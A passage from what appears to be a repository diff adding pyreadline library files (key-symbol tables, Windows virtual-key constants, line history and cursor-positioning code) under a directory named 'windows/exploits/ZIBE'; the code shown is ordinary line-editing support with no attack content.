c32.NumPad2: u'NUMPAD2',
|
||||
c32.NumPad3: u'NUMPAD3',
|
||||
c32.NumPad4: u'NUMPAD4',
|
||||
c32.NumPad5: u'NUMPAD5',
|
||||
c32.NumPad6: u'NUMPAD6',
|
||||
c32.NumPad7: u'NUMPAD7',
|
||||
c32.NumPad8: u'NUMPAD8',
|
||||
c32.NumPad9: u'NUMPAD9',
|
||||
c32.Divide: u'Divide',
|
||||
c32.Multiply: u'Multiply',
|
||||
c32.Add: u'Add',
|
||||
c32.Subtract: u'Subtract',
|
||||
c32.Decimal: u'VK_DECIMAL'
|
||||
}
|
||||
|
||||
# function to handle the mapping
|
||||
def make_keysym(keycode):
|
||||
try:
|
||||
sym = code2sym_map[keycode]
|
||||
except KeyError:
|
||||
sym = u''
|
||||
return sym
|
||||
|
||||
sym2code_map = {}
|
||||
for code,sym in code2sym_map.iteritems():
|
||||
sym2code_map[sym.lower()] = code
|
||||
|
||||
def key_text_to_keyinfo(keytext):
|
||||
u'''Convert a GNU readline style textual description of a key to keycode with modifiers'''
|
||||
if keytext.startswith('"'): # "
|
||||
return keyseq_to_keyinfo(keytext[1:-1])
|
||||
else:
|
||||
return keyname_to_keyinfo(keytext)
|
||||
|
||||
|
||||
def char_to_keyinfo(char, control=False, meta=False, shift=False):
|
||||
vk = (ord(char))
|
||||
if vk & 0xffff == 0xffff:
|
||||
print u'VkKeyScan("%s") = %x' % (char, vk)
|
||||
raise ValueError, u'bad key'
|
||||
if vk & 0x100:
|
||||
shift = True
|
||||
if vk & 0x200:
|
||||
control = True
|
||||
if vk & 0x400:
|
||||
meta = True
|
||||
return (control, meta, shift, vk & 0xff)
|
||||
|
||||
def keyname_to_keyinfo(keyname):
|
||||
control = False
|
||||
meta = False
|
||||
shift = False
|
||||
|
||||
while 1:
|
||||
lkeyname = keyname.lower()
|
||||
if lkeyname.startswith(u'control-'):
|
||||
control = True
|
||||
keyname = keyname[8:]
|
||||
elif lkeyname.startswith(u'ctrl-'):
|
||||
control = True
|
||||
keyname = keyname[5:]
|
||||
elif lkeyname.startswith(u'meta-'):
|
||||
meta = True
|
||||
keyname = keyname[5:]
|
||||
elif lkeyname.startswith(u'alt-'):
|
||||
meta = True
|
||||
keyname = keyname[4:]
|
||||
elif lkeyname.startswith(u'shift-'):
|
||||
shift = True
|
||||
keyname = keyname[6:]
|
||||
else:
|
||||
if len(keyname) > 1:
|
||||
return (control, meta, shift, sym2code_map.get(keyname.lower(),u" "))
|
||||
else:
|
||||
return char_to_keyinfo(keyname, control, meta, shift)
|
||||
|
||||
def keyseq_to_keyinfo(keyseq):
|
||||
res = []
|
||||
control = False
|
||||
meta = False
|
||||
shift = False
|
||||
|
||||
while 1:
|
||||
if keyseq.startswith(u'\\C-'):
|
||||
control = True
|
||||
keyseq = keyseq[3:]
|
||||
elif keyseq.startswith(u'\\M-'):
|
||||
meta = True
|
||||
keyseq = keyseq[3:]
|
||||
elif keyseq.startswith(u'\\e'):
|
||||
res.append(char_to_keyinfo(u'\033', control, meta, shift))
|
||||
control = meta = shift = False
|
||||
keyseq = keyseq[2:]
|
||||
elif len(keyseq) >= 1:
|
||||
res.append(char_to_keyinfo(keyseq[0], control, meta, shift))
|
||||
control = meta = shift = False
|
||||
keyseq = keyseq[1:]
|
||||
else:
|
||||
return res[0]
|
||||
|
||||
def make_keyinfo(keycode, state):
|
||||
control = False
|
||||
meta =False
|
||||
shift = False
|
||||
return (control, meta, shift, keycode)
|
||||
|
||||
|
||||
def make_KeyPress(char, state, keycode):
|
||||
|
||||
shift = bool(int(state) & int(Shift))
|
||||
control = bool(int(state) & int(Control))
|
||||
meta = bool(int(state) & int(Alt))
|
||||
keyname = code2sym_map.get(keycode, u"").lower()
|
||||
if control and meta: #equivalent to altgr so clear flags
|
||||
control = False
|
||||
meta = False
|
||||
elif control:
|
||||
char = str(keycode)
|
||||
return KeyPress(char, shift, control, meta, keyname)
|
||||
|
133
windows/exploits/ZIBE/pyreadline/keysyms/keysyms.py
Normal file
|
@ -0,0 +1,133 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2003-2006 Gary Bishop.
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import winconstants as c32
|
||||
from pyreadline.logger import log
|
||||
from ctypes import windll
|
||||
import ctypes
|
||||
# table for translating virtual keys to X windows key symbols
|
||||
|
||||
from common import validkey, KeyPress, make_KeyPress_from_keydescr
|
||||
|
||||
code2sym_map = {c32.VK_CANCEL: u'cancel',
|
||||
c32.VK_BACK: u'backspace',
|
||||
c32.VK_TAB: u'tab',
|
||||
c32.VK_CLEAR: u'clear',
|
||||
c32.VK_RETURN: u'return',
|
||||
c32.VK_SHIFT: u'shift_l',
|
||||
c32.VK_CONTROL: u'control_l',
|
||||
c32.VK_MENU: u'alt_l',
|
||||
c32.VK_PAUSE: u'pause',
|
||||
c32.VK_CAPITAL: u'caps_lock',
|
||||
c32.VK_ESCAPE: u'escape',
|
||||
c32.VK_SPACE: u'space',
|
||||
c32.VK_PRIOR: u'prior',
|
||||
c32.VK_NEXT: u'next',
|
||||
c32.VK_END: u'end',
|
||||
c32.VK_HOME: u'home',
|
||||
c32.VK_LEFT: u'left',
|
||||
c32.VK_UP: u'up',
|
||||
c32.VK_RIGHT: u'right',
|
||||
c32.VK_DOWN: u'down',
|
||||
c32.VK_SELECT: u'select',
|
||||
c32.VK_PRINT: u'print',
|
||||
c32.VK_EXECUTE: u'execute',
|
||||
c32.VK_SNAPSHOT: u'snapshot',
|
||||
c32.VK_INSERT: u'insert',
|
||||
c32.VK_DELETE: u'delete',
|
||||
c32.VK_HELP: u'help',
|
||||
c32.VK_F1: u'f1',
|
||||
c32.VK_F2: u'f2',
|
||||
c32.VK_F3: u'f3',
|
||||
c32.VK_F4: u'f4',
|
||||
c32.VK_F5: u'f5',
|
||||
c32.VK_F6: u'f6',
|
||||
c32.VK_F7: u'f7',
|
||||
c32.VK_F8: u'f8',
|
||||
c32.VK_F9: u'f9',
|
||||
c32.VK_F10: u'f10',
|
||||
c32.VK_F11: u'f11',
|
||||
c32.VK_F12: u'f12',
|
||||
c32.VK_F13: u'f13',
|
||||
c32.VK_F14: u'f14',
|
||||
c32.VK_F15: u'f15',
|
||||
c32.VK_F16: u'f16',
|
||||
c32.VK_F17: u'f17',
|
||||
c32.VK_F18: u'f18',
|
||||
c32.VK_F19: u'f19',
|
||||
c32.VK_F20: u'f20',
|
||||
c32.VK_F21: u'f21',
|
||||
c32.VK_F22: u'f22',
|
||||
c32.VK_F23: u'f23',
|
||||
c32.VK_F24: u'f24',
|
||||
c32.VK_NUMLOCK: u'num_lock,',
|
||||
c32.VK_SCROLL: u'scroll_lock',
|
||||
c32.VK_APPS: u'vk_apps',
|
||||
c32.VK_PROCESSKEY: u'vk_processkey',
|
||||
c32.VK_ATTN: u'vk_attn',
|
||||
c32.VK_CRSEL: u'vk_crsel',
|
||||
c32.VK_EXSEL: u'vk_exsel',
|
||||
c32.VK_EREOF: u'vk_ereof',
|
||||
c32.VK_PLAY: u'vk_play',
|
||||
c32.VK_ZOOM: u'vk_zoom',
|
||||
c32.VK_NONAME: u'vk_noname',
|
||||
c32.VK_PA1: u'vk_pa1',
|
||||
c32.VK_OEM_CLEAR: u'vk_oem_clear',
|
||||
c32.VK_NUMPAD0: u'numpad0',
|
||||
c32.VK_NUMPAD1: u'numpad1',
|
||||
c32.VK_NUMPAD2: u'numpad2',
|
||||
c32.VK_NUMPAD3: u'numpad3',
|
||||
c32.VK_NUMPAD4: u'numpad4',
|
||||
c32.VK_NUMPAD5: u'numpad5',
|
||||
c32.VK_NUMPAD6: u'numpad6',
|
||||
c32.VK_NUMPAD7: u'numpad7',
|
||||
c32.VK_NUMPAD8: u'numpad8',
|
||||
c32.VK_NUMPAD9: u'numpad9',
|
||||
c32.VK_DIVIDE: u'divide',
|
||||
c32.VK_MULTIPLY: u'multiply',
|
||||
c32.VK_ADD: u'add',
|
||||
c32.VK_SUBTRACT: u'subtract',
|
||||
c32.VK_DECIMAL: u'vk_decimal'
|
||||
}
|
||||
|
||||
VkKeyScan = windll.user32.VkKeyScanA
|
||||
|
||||
def char_to_keyinfo(char, control=False, meta=False, shift=False):
|
||||
k=KeyPress()
|
||||
vk = VkKeyScan(ord(char))
|
||||
if vk & 0xffff == 0xffff:
|
||||
print u'VkKeyScan("%s") = %x' % (char, vk)
|
||||
raise ValueError, u'bad key'
|
||||
if vk & 0x100:
|
||||
k.shift = True
|
||||
if vk & 0x200:
|
||||
k.control = True
|
||||
if vk & 0x400:
|
||||
k.meta = True
|
||||
k.char=chr(vk & 0xff)
|
||||
return k
|
||||
|
||||
def make_KeyPress(char, state, keycode):
|
||||
control = (state & (4+8)) != 0
|
||||
meta = (state & (1+2)) != 0
|
||||
shift = (state & 0x10) != 0
|
||||
if control and not meta:#Matches ctrl- chords should pass keycode as char
|
||||
char = chr(keycode)
|
||||
elif control and meta: #Matches alt gr and should just pass on char
|
||||
control = False
|
||||
meta = False
|
||||
try:
|
||||
keyname=code2sym_map[keycode]
|
||||
except KeyError:
|
||||
keyname = u""
|
||||
out = KeyPress(char, shift, control, meta, keyname)
|
||||
return out
|
||||
|
||||
if __name__==u"__main__":
|
||||
import startup
|
||||
|
171
windows/exploits/ZIBE/pyreadline/keysyms/winconstants.py
Normal file
|
@ -0,0 +1,171 @@
|
|||
#This file contains constants that are normally found in win32all
|
||||
#But included here to avoid the dependency
|
||||
|
||||
VK_LBUTTON=1
|
||||
VK_RBUTTON=2
|
||||
VK_CANCEL=3
|
||||
VK_MBUTTON=4
|
||||
VK_XBUTTON1=5
|
||||
VK_XBUTTON2=6
|
||||
VK_BACK=8
|
||||
VK_TAB=9
|
||||
VK_CLEAR=12
|
||||
VK_RETURN=13
|
||||
VK_SHIFT=16
|
||||
VK_CONTROL=17
|
||||
VK_MENU=18
|
||||
VK_PAUSE=19
|
||||
VK_CAPITAL=20
|
||||
VK_KANA=0x15
|
||||
VK_HANGEUL=0x15
|
||||
VK_HANGUL=0x15
|
||||
VK_JUNJA=0x17
|
||||
VK_FINAL=0x18
|
||||
VK_HANJA=0x19
|
||||
VK_KANJI=0x19
|
||||
VK_ESCAPE=0x1B
|
||||
VK_CONVERT=0x1C
|
||||
VK_NONCONVERT=0x1D
|
||||
VK_ACCEPT=0x1E
|
||||
VK_MODECHANGE=0x1F
|
||||
VK_SPACE=32
|
||||
VK_PRIOR=33
|
||||
VK_NEXT=34
|
||||
VK_END=35
|
||||
VK_HOME=36
|
||||
VK_LEFT=37
|
||||
VK_UP=38
|
||||
VK_RIGHT=39
|
||||
VK_DOWN=40
|
||||
VK_SELECT=41
|
||||
VK_PRINT=42
|
||||
VK_EXECUTE=43
|
||||
VK_SNAPSHOT=44
|
||||
VK_INSERT=45
|
||||
VK_DELETE=46
|
||||
VK_HELP=47
|
||||
VK_LWIN=0x5B
|
||||
VK_RWIN=0x5C
|
||||
VK_APPS=0x5D
|
||||
VK_SLEEP=0x5F
|
||||
VK_NUMPAD0=0x60
|
||||
VK_NUMPAD1=0x61
|
||||
VK_NUMPAD2=0x62
|
||||
VK_NUMPAD3=0x63
|
||||
VK_NUMPAD4=0x64
|
||||
VK_NUMPAD5=0x65
|
||||
VK_NUMPAD6=0x66
|
||||
VK_NUMPAD7=0x67
|
||||
VK_NUMPAD8=0x68
|
||||
VK_NUMPAD9=0x69
|
||||
VK_MULTIPLY=0x6A
|
||||
VK_ADD=0x6B
|
||||
VK_SEPARATOR=0x6C
|
||||
VK_SUBTRACT=0x6D
|
||||
VK_DECIMAL=0x6E
|
||||
VK_DIVIDE=0x6F
|
||||
VK_F1=0x70
|
||||
VK_F2=0x71
|
||||
VK_F3=0x72
|
||||
VK_F4=0x73
|
||||
VK_F5=0x74
|
||||
VK_F6=0x75
|
||||
VK_F7=0x76
|
||||
VK_F8=0x77
|
||||
VK_F9=0x78
|
||||
VK_F10=0x79
|
||||
VK_F11=0x7A
|
||||
VK_F12=0x7B
|
||||
VK_F13=0x7C
|
||||
VK_F14=0x7D
|
||||
VK_F15=0x7E
|
||||
VK_F16=0x7F
|
||||
VK_F17=0x80
|
||||
VK_F18=0x81
|
||||
VK_F19=0x82
|
||||
VK_F20=0x83
|
||||
VK_F21=0x84
|
||||
VK_F22=0x85
|
||||
VK_F23=0x86
|
||||
VK_F24=0x87
|
||||
VK_NUMLOCK=0x90
|
||||
VK_SCROLL=0x91
|
||||
VK_LSHIFT=0xA0
|
||||
VK_RSHIFT=0xA1
|
||||
VK_LCONTROL=0xA2
|
||||
VK_RCONTROL=0xA3
|
||||
VK_LMENU=0xA4
|
||||
VK_RMENU=0xA5
|
||||
VK_BROWSER_BACK=0xA6
|
||||
VK_BROWSER_FORWARD=0xA7
|
||||
VK_BROWSER_REFRESH=0xA8
|
||||
VK_BROWSER_STOP=0xA9
|
||||
VK_BROWSER_SEARCH=0xAA
|
||||
VK_BROWSER_FAVORITES=0xAB
|
||||
VK_BROWSER_HOME=0xAC
|
||||
VK_VOLUME_MUTE=0xAD
|
||||
VK_VOLUME_DOWN=0xAE
|
||||
VK_VOLUME_UP=0xAF
|
||||
VK_MEDIA_NEXT_TRACK=0xB0
|
||||
VK_MEDIA_PREV_TRACK=0xB1
|
||||
VK_MEDIA_STOP=0xB2
|
||||
VK_MEDIA_PLAY_PAUSE=0xB3
|
||||
VK_LAUNCH_MAIL=0xB4
|
||||
VK_LAUNCH_MEDIA_SELECT=0xB5
|
||||
VK_LAUNCH_APP1=0xB6
|
||||
VK_LAUNCH_APP2=0xB7
|
||||
VK_OEM_1=0xBA
|
||||
VK_OEM_PLUS=0xBB
|
||||
VK_OEM_COMMA=0xBC
|
||||
VK_OEM_MINUS=0xBD
|
||||
VK_OEM_PERIOD=0xBE
|
||||
VK_OEM_2=0xBF
|
||||
VK_OEM_3=0xC0
|
||||
VK_OEM_4=0xDB
|
||||
VK_OEM_5=0xDC
|
||||
VK_OEM_6=0xDD
|
||||
VK_OEM_7=0xDE
|
||||
VK_OEM_8=0xDF
|
||||
VK_OEM_102=0xE2
|
||||
VK_PROCESSKEY=0xE5
|
||||
VK_PACKET=0xE7
|
||||
VK_ATTN=0xF6
|
||||
VK_CRSEL=0xF7
|
||||
VK_EXSEL=0xF8
|
||||
VK_EREOF=0xF9
|
||||
VK_PLAY=0xFA
|
||||
VK_ZOOM=0xFB
|
||||
VK_NONAME=0xFC
|
||||
VK_PA1=0xFD
|
||||
VK_OEM_CLEAR=0xFE
|
||||
|
||||
CF_TEXT=1
|
||||
CF_BITMAP=2
|
||||
CF_METAFILEPICT=3
|
||||
CF_SYLK=4
|
||||
CF_DIF=5
|
||||
CF_TIFF=6
|
||||
CF_OEMTEXT=7
|
||||
CF_DIB=8
|
||||
CF_PALETTE=9
|
||||
CF_PENDATA=10
|
||||
CF_RIFF=11
|
||||
CF_WAVE=12
|
||||
CF_UNICODETEXT=13
|
||||
CF_ENHMETAFILE=14
|
||||
CF_HDROP=15
|
||||
CF_LOCALE=16
|
||||
CF_MAX=17
|
||||
CF_OWNERDISPLAY=128
|
||||
CF_DSPTEXT=129
|
||||
CF_DSPBITMAP=130
|
||||
CF_DSPMETAFILEPICT=131
|
||||
CF_DSPENHMETAFILE=142
|
||||
CF_PRIVATEFIRST=512
|
||||
CF_PRIVATELAST=767
|
||||
CF_GDIOBJFIRST=768
|
||||
CF_GDIOBJLAST=1023
|
||||
|
||||
|
||||
GPTR=64
|
||||
GHND=66
|
BIN
windows/exploits/ZIBE/pyreadline/lineeditor/__init__.pyc
Normal file
Binary file not shown.
264
windows/exploits/ZIBE/pyreadline/lineeditor/history.py
Normal file
|
@ -0,0 +1,264 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import re, operator,string, sys,os
|
||||
|
||||
from pyreadline.unicode_helper import ensure_unicode, ensure_str
|
||||
if u"pyreadline" in sys.modules:
|
||||
pyreadline = sys.modules[u"pyreadline"]
|
||||
else:
|
||||
import pyreadline
|
||||
|
||||
import lineobj
|
||||
|
||||
import exceptions
|
||||
|
||||
class EscapeHistory(exceptions.Exception):
|
||||
pass
|
||||
|
||||
from pyreadline.logger import log
|
||||
|
||||
|
||||
class LineHistory(object):
|
||||
def __init__(self):
|
||||
self.history = []
|
||||
self._history_length = 100
|
||||
self._history_cursor = 0
|
||||
self.history_filename = os.path.expanduser('~/.history') #Cannot expand unicode strings correctly on python2.4
|
||||
self.lastcommand = None
|
||||
self.query = u""
|
||||
self.last_search_for = u""
|
||||
|
||||
def get_current_history_length(self):
|
||||
u'''Return the number of lines currently in the history.
|
||||
(This is different from get_history_length(), which returns
|
||||
the maximum number of lines that will be written to a history file.)'''
|
||||
value = len(self.history)
|
||||
log(u"get_current_history_length:%d"%value)
|
||||
return value
|
||||
|
||||
def get_history_length(self):
|
||||
u'''Return the desired length of the history file. Negative values imply
|
||||
unlimited history file size.'''
|
||||
value = self._history_length
|
||||
log(u"get_history_length:%d"%value)
|
||||
return value
|
||||
|
||||
def get_history_item(self, index):
|
||||
u'''Return the current contents of history item at index (starts with index 1).'''
|
||||
item = self.history[index - 1]
|
||||
log(u"get_history_item: index:%d item:%r"%(index, item))
|
||||
return item.get_line_text()
|
||||
|
||||
def set_history_length(self, value):
|
||||
log(u"set_history_length: old:%d new:%d"%(self._history_length, value))
|
||||
self._history_length = value
|
||||
|
||||
def get_history_cursor(self):
|
||||
value = self._history_cursor
|
||||
log(u"get_history_cursor:%d"%value)
|
||||
return value
|
||||
|
||||
def set_history_cursor(self, value):
|
||||
log(u"set_history_cursor: old:%d new:%d"%(self._history_cursor, value))
|
||||
self._history_cursor = value
|
||||
|
||||
history_length = property(get_history_length, set_history_length)
|
||||
history_cursor = property(get_history_cursor, set_history_cursor)
|
||||
|
||||
def clear_history(self):
|
||||
u'''Clear readline history.'''
|
||||
self.history[:] = []
|
||||
self.history_cursor = 0
|
||||
|
||||
def read_history_file(self, filename=None):
|
||||
u'''Load a readline history file.'''
|
||||
if filename is None:
|
||||
filename = self.history_filename
|
||||
try:
|
||||
for line in open(filename, u'r'):
|
||||
self.add_history(lineobj.ReadLineTextBuffer(ensure_unicode(line.rstrip())))
|
||||
except IOError:
|
||||
self.history = []
|
||||
self.history_cursor = 0
|
||||
|
||||
def write_history_file(self, filename = None):
|
||||
u'''Save a readline history file.'''
|
||||
if filename is None:
|
||||
filename = self.history_filename
|
||||
fp = open(filename, u'wb')
|
||||
for line in self.history[-self.history_length:]:
|
||||
fp.write(ensure_str(line.get_line_text()))
|
||||
fp.write(u'\n')
|
||||
fp.close()
|
||||
|
||||
|
||||
def add_history(self, line):
|
||||
u'''Append a line to the history buffer, as if it was the last line typed.'''
|
||||
if not hasattr(line, "get_line_text"):
|
||||
line = lineobj.ReadLineTextBuffer(line)
|
||||
if not line.get_line_text():
|
||||
pass
|
||||
elif len(self.history) > 0 and self.history[-1].get_line_text() == line.get_line_text():
|
||||
pass
|
||||
else:
|
||||
self.history.append(line)
|
||||
self.history_cursor = len(self.history)
|
||||
|
||||
def previous_history(self, current): # (C-p)
|
||||
u'''Move back through the history list, fetching the previous command. '''
|
||||
if self.history_cursor == len(self.history):
|
||||
self.history.append(current.copy()) #do not use add_history since we do not want to increment cursor
|
||||
|
||||
if self.history_cursor > 0:
|
||||
self.history_cursor -= 1
|
||||
current.set_line(self.history[self.history_cursor].get_line_text())
|
||||
current.point = lineobj.EndOfLine
|
||||
|
||||
def next_history(self, current): # (C-n)
|
||||
u'''Move forward through the history list, fetching the next command. '''
|
||||
if self.history_cursor < len(self.history) - 1:
|
||||
self.history_cursor += 1
|
||||
current.set_line(self.history[self.history_cursor].get_line_text())
|
||||
|
||||
def beginning_of_history(self): # (M-<)
|
||||
u'''Move to the first line in the history.'''
|
||||
self.history_cursor = 0
|
||||
if len(self.history) > 0:
|
||||
self.l_buffer = self.history[0]
|
||||
|
||||
def end_of_history(self, current): # (M->)
|
||||
u'''Move to the end of the input history, i.e., the line currently
|
||||
being entered.'''
|
||||
self.history_cursor = len(self.history)
|
||||
current.set_line(self.history[-1].get_line_text())
|
||||
|
||||
def reverse_search_history(self, searchfor, startpos=None):
|
||||
if startpos is None:
|
||||
startpos = self.history_cursor
|
||||
origpos = startpos
|
||||
|
||||
result = lineobj.ReadLineTextBuffer("")
|
||||
|
||||
for idx, line in list(enumerate(self.history))[startpos:0:-1]:
|
||||
if searchfor in line:
|
||||
startpos = idx
|
||||
break
|
||||
|
||||
#If we get a new search without change in search term it means
|
||||
#someone pushed ctrl-r and we should find the next match
|
||||
if self.last_search_for == searchfor and startpos > 0:
|
||||
startpos -= 1
|
||||
for idx, line in list(enumerate(self.history))[startpos:0:-1]:
|
||||
if searchfor in line:
|
||||
startpos = idx
|
||||
break
|
||||
|
||||
if self.history:
|
||||
result = self.history[startpos].get_line_text()
|
||||
else:
|
||||
result = u""
|
||||
self.history_cursor = startpos
|
||||
self.last_search_for = searchfor
|
||||
log(u"reverse_search_history: old:%d new:%d result:%r"%(origpos, self.history_cursor, result))
|
||||
return result
|
||||
|
||||
def forward_search_history(self, searchfor, startpos=None):
|
||||
if startpos is None:
|
||||
startpos = min(self.history_cursor, max(0, self.get_current_history_length()-1))
|
||||
origpos = startpos
|
||||
|
||||
result = lineobj.ReadLineTextBuffer("")
|
||||
|
||||
for idx, line in list(enumerate(self.history))[startpos:]:
|
||||
if searchfor in line:
|
||||
startpos = idx
|
||||
break
|
||||
|
||||
#If we get a new search without change in search term it means
|
||||
#someone pushed ctrl-r and we should find the next match
|
||||
if self.last_search_for == searchfor and startpos < self.get_current_history_length()-1:
|
||||
startpos += 1
|
||||
for idx, line in list(enumerate(self.history))[startpos:]:
|
||||
if searchfor in line:
|
||||
startpos = idx
|
||||
break
|
||||
|
||||
if self.history:
|
||||
result = self.history[startpos].get_line_text()
|
||||
else:
|
||||
result = u""
|
||||
self.history_cursor = startpos
|
||||
self.last_search_for = searchfor
|
||||
return result
|
||||
|
||||
def _search(self, direction, partial):
|
||||
try:
|
||||
if (self.lastcommand != self.history_search_forward and
|
||||
self.lastcommand != self.history_search_backward):
|
||||
self.query = u''.join(partial[0:partial.point].get_line_text())
|
||||
hcstart = max(self.history_cursor,0)
|
||||
hc = self.history_cursor + direction
|
||||
while (direction < 0 and hc >= 0) or (direction > 0 and hc < len(self.history)):
|
||||
h = self.history[hc]
|
||||
if not self.query:
|
||||
self.history_cursor = hc
|
||||
result = lineobj.ReadLineTextBuffer(h, point=len(h.get_line_text()))
|
||||
return result
|
||||
elif (h.get_line_text().startswith(self.query) and (h != partial.get_line_text())):
|
||||
self.history_cursor = hc
|
||||
result = lineobj.ReadLineTextBuffer(h, point=partial.point)
|
||||
return result
|
||||
hc += direction
|
||||
else:
|
||||
if len(self.history) == 0:
|
||||
pass
|
||||
elif hc >= len(self.history) and not self.query:
|
||||
self.history_cursor = len(self.history)
|
||||
return lineobj.ReadLineTextBuffer(u"", point=0)
|
||||
elif self.history[max(min(hcstart, len(self.history) - 1), 0)]\
|
||||
.get_line_text().startswith(self.query) and self.query:
|
||||
return lineobj.ReadLineTextBuffer(self.history\
|
||||
[max(min(hcstart, len(self.history) - 1),0)],
|
||||
point = partial.point)
|
||||
else:
|
||||
return lineobj.ReadLineTextBuffer(partial,
|
||||
point=partial.point)
|
||||
return lineobj.ReadLineTextBuffer(self.query,
|
||||
point=min(len(self.query),
|
||||
partial.point))
|
||||
except IndexError:
|
||||
raise
|
||||
|
||||
def history_search_forward(self, partial): # ()
|
||||
u'''Search forward through the history for the string of characters
|
||||
between the start of the current line and the point. This is a
|
||||
non-incremental search. By default, this command is unbound.'''
|
||||
q= self._search(1, partial)
|
||||
return q
|
||||
|
||||
def history_search_backward(self, partial): # ()
|
||||
u'''Search backward through the history for the string of characters
|
||||
between the start of the current line and the point. This is a
|
||||
non-incremental search. By default, this command is unbound.'''
|
||||
|
||||
q= self._search(-1, partial)
|
||||
return q
|
||||
|
||||
if __name__==u"__main__":
|
||||
import pdb
|
||||
q = LineHistory()
|
||||
r = LineHistory()
|
||||
s = LineHistory()
|
||||
RL = lineobj.ReadLineTextBuffer
|
||||
q.add_history(RL(u"aaaa"))
|
||||
q.add_history(RL(u"aaba"))
|
||||
q.add_history(RL(u"aaca"))
|
||||
q.add_history(RL(u"akca"))
|
||||
q.add_history(RL(u"bbb"))
|
||||
q.add_history(RL(u"ako"))
|
||||
r.add_history(RL(u"ako"))
|
799
windows/exploits/ZIBE/pyreadline/lineeditor/lineobj.py
Normal file
799
windows/exploits/ZIBE/pyreadline/lineeditor/lineobj.py
Normal file
|
@ -0,0 +1,799 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import re, operator, sys
|
||||
|
||||
import wordmatcher
|
||||
import pyreadline.clipboard as clipboard
|
||||
from pyreadline.logger import log
|
||||
from pyreadline.unicode_helper import ensure_unicode
|
||||
|
||||
kill_ring_to_clipboard = False #set to true to copy every addition to kill ring to clipboard
|
||||
|
||||
|
||||
class NotAWordError(IndexError):
|
||||
pass
|
||||
|
||||
|
||||
def quote_char(c):
|
||||
if ord(c) > 0:
|
||||
return c
|
||||
|
||||
############## Line positioner ########################
|
||||
|
||||
class LinePositioner(object):
|
||||
def __call__(self, line):
|
||||
NotImplementedError(u"Base class !!!")
|
||||
|
||||
class NextChar(LinePositioner):
|
||||
def __call__(self, line):
|
||||
if line.point < len(line.line_buffer):
|
||||
return line.point + 1
|
||||
else:
|
||||
return line.point
|
||||
NextChar = NextChar()
|
||||
|
||||
class PrevChar(LinePositioner):
|
||||
def __call__(self, line):
|
||||
if line.point > 0:
|
||||
return line.point - 1
|
||||
else:
|
||||
return line.point
|
||||
PrevChar = PrevChar()
|
||||
|
||||
class NextWordStart(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.next_start_segment(line.line_buffer, line.is_word_token)[line.point]
|
||||
NextWordStart = NextWordStart()
|
||||
|
||||
class NextWordEnd(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.next_end_segment(line.line_buffer, line.is_word_token)[line.point]
|
||||
NextWordEnd = NextWordEnd()
|
||||
|
||||
class PrevWordStart(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.prev_start_segment(line.line_buffer, line.is_word_token)[line.point]
|
||||
PrevWordStart = PrevWordStart()
|
||||
|
||||
|
||||
class WordStart(LinePositioner):
|
||||
def __call__(self, line):
|
||||
if line.is_word_token(line.get_line_text()[Point(line):Point(line) + 1]):
|
||||
if Point(line) > 0 and line.is_word_token(line.get_line_text()[Point(line) - 1:Point(line)]):
|
||||
return PrevWordStart(line)
|
||||
else:
|
||||
return line.point
|
||||
else:
|
||||
raise NotAWordError(u"Point is not in a word")
|
||||
WordStart = WordStart()
|
||||
|
||||
class WordEnd(LinePositioner):
|
||||
def __call__(self, line):
|
||||
if line.is_word_token(line.get_line_text()[Point(line):Point(line) + 1]):
|
||||
if line.is_word_token(line.get_line_text()[Point(line) + 1:Point(line) + 2]):
|
||||
return NextWordEnd(line)
|
||||
else:
|
||||
return line.point
|
||||
else:
|
||||
raise NotAWordError(u"Point is not in a word")
|
||||
WordEnd = WordEnd()
|
||||
|
||||
class PrevWordEnd(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.prev_end_segment(line.line_buffer, line.is_word_token)[line.point]
|
||||
PrevWordEnd = PrevWordEnd()
|
||||
|
||||
class PrevSpace(LinePositioner):
|
||||
def __call__(self, line):
|
||||
point = line.point
|
||||
if line[point - 1:point].get_line_text() == u" ":
|
||||
while point > 0 and line[point - 1:point].get_line_text() == u" ":
|
||||
point -= 1
|
||||
while point > 0 and line[point - 1:point].get_line_text() != u" ":
|
||||
point -= 1
|
||||
return point
|
||||
PrevSpace = PrevSpace()
|
||||
|
||||
|
||||
class StartOfLine(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return 0
|
||||
StartOfLine = StartOfLine()
|
||||
|
||||
class EndOfLine(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return len(line.line_buffer)
|
||||
EndOfLine = EndOfLine()
|
||||
|
||||
class Point(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.point
|
||||
Point = Point()
|
||||
|
||||
class Mark(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.mark
|
||||
k = Mark()
|
||||
|
||||
all_positioners = [(value.__class__.__name__, value)
|
||||
for key, value in globals().items()
|
||||
if isinstance(value, LinePositioner)]
|
||||
all_positioners.sort()
|
||||
|
||||
############### LineSlice #################
|
||||
|
||||
class LineSlice(object):
|
||||
def __call__(self, line):
|
||||
NotImplementedError(u"Base class !!!")
|
||||
|
||||
|
||||
class CurrentWord(LineSlice):
|
||||
def __call__(self, line):
|
||||
return slice(WordStart(line), WordEnd(line), None)
|
||||
CurrentWord = CurrentWord()
|
||||
|
||||
class NextWord(LineSlice):
|
||||
def __call__(self, line):
|
||||
work = TextLine(line)
|
||||
work.point = NextWordStart
|
||||
start = work.point
|
||||
stop = NextWordEnd(work)
|
||||
return slice(start, stop)
